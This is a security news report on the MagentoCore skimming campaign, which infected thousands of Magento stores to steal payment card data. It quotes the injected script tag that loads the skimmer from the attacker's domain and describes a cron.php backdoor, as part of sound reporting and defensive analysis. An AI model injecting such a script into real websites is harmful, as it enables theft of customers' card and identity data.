MagentoCore skimmer already infected 7,339 Magento stores

MagentoCore skimmer already infected 7,339 Magento stores, according to the Willem de Groot who uncovered the campaign, it is the most aggressive to date.

The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.

Threat actors behind this campaign managed to compromise the websites running Magento and injected the payment card scraper in its source code.

Crooks attempts to access the control panel of Magento stores with brute force attacks.

At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.

Willem de Groot reported that the hacking campaign is involving a skimmer script loaded from the magentocore.net domain.

“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.

The expert found the MagentoCore script on 7,339 Magento stores in the past six months, the campaign is still ongoing and hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.

“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.

Once the attackers succeed in compromising a website, it will add an embedded piece of Javascript to the HTML template:

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to  “magentocore.net” server.

The expert noticed that the malware implements a recovery mechanism, in case of the Magento software, it adds a backdoor to cron.php that will periodically download the malicious code, and, after running, delete itself.

“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.

“But the real victims are eventually the customers, who have their card and identity stolen.”

According to Bleeping Computer that quoted Yonathan Klijnsma, Threat Researcher Lead for RiskIQ, the MagentoCore campaign is actually part of a larger card scraping campaign known as MageCart that been active since late 2015.

According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmer scripts.

Pierluigi Paganini

(Security Affairs – data breached, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]